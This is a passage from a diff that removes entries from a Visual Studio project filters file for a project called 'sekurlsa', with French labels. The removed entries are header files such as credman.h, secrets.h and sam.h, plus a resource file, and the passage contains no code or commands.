- <ClInclude Include="..\..\commun\secpkg.h" /> - <ClInclude Include="..\..\modules\mod_process.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - <ClInclude Include="modules\incognito.h"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClInclude> - <ClInclude Include="modules\credman.h"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClInclude> - <ClInclude Include="modules\secrets.h"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClInclude> - <ClInclude Include="modules\sam.h"> - <Filter>Modules locaux pour sekurlsa</Filter> - </ClInclude> - </ItemGroup> - <ItemGroup> - <ResourceCompile Include="sekurlsa.rc" /> - </ItemGroup> -</Project>
\ No newline at end of file |